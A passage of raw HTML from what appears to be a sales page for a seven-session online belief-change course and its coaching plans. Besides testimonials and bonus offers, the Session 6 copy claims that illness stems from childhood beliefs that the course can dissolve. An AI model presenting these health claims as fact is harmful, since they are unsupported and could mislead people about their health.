reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships. If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?\r\n\r\nHumans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\r\n\r\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2.jpg"><img class="alignleft  wp-image-1029" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2-250x300.jpg" alt="Carista portrait 2" width="160" height="192" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">Optional Support On Your Journey</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>You can easily take this journey on your own, one recorded session at a time.  You also have the option of adding personalized support from a <em>Clear Your Beliefs Coach</em> – a qualified professional who will accompany you on your journey and guide you, step-by-step, through the process.\r\n\r\nOur outstanding coaches are trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\r\n\r\n<em>Clear Your Beliefs Coaches</em> are located throughout the United States and Canada, and worldwide, from Europe to Australia, and South Africa to Scandinavia. Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\r\n\r\n[<strong>Note: <em>Clear Your Beliefs Coaches</em> help you change your own beliefs and reduce the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis</strong>.]\r\n\r\nTake advantage of this up-close-and-personal support during the program.  Support sessions are optional, and are provided at an additional cost.  Choose the plan that suits you best - from the recorded program-only, to full support each week.\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home.  Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund 